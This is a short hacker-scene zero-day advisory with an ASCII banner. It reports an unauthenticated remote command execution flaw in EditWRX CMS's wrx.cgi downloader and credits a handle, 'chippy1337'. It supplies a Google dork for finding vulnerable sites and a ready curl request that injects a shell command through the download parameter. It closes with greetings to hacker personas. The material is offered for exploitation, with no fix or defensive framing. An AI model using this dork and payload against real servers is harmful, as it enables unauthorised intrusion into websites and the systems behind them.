__     __                     ____   ______ ______ ______ 
.----.|  |--.|__|.-----.-----.--.--.|_   | |__    |__    |      |
|  __||     ||  ||  _  |  _  |  |  | _|  |_|__    |__    |_     |
|____||__|__||__||   __|   __|___  ||______|______|______| |____|
_________________|__|__|__|__|_____|_____________________________
 
VULN_____________________________________________________________
EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
 
NFO______________________________________________________________
EditWRX is vulnerable to remote code execution through mishandling
of open() in the downloader, which can read in piped commands.
Despite the downloader being an administrative component, a login
is not required to call the function, and therefore no access is
required to exploit this vulnerability.
 
ZDAY_____________________________________________________________
Google: inurl:editwrx/wrx.cgi
RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a|
Found by: chippy1337
 
GREETZ___________________________________________________________
Robert Cavanaugh
Ryan Cleary
Jasper Lingers
Carlos1337 (dos cero dia!)
MASTER HACKER
FLOOD HACKER
DR TIGER
WANG HACKER
DDOS KING
Sabu, Havij Professional
D0xbin